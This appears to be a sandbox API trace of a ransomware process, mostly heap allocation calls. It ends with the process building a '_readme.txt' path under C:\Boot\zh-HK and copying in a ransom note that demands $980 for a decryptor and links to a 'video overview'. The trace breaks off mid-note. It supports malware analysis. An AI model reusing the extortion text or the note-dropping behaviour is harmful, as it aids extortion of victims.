[0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.854] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0173.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.854] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.854] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.854] PathFindFileNameW (pszPath="") returned="" [0173.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.854] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.855] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.855] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.855] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8ca68 [0173.855] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0173.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.855] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0173.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.856] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer 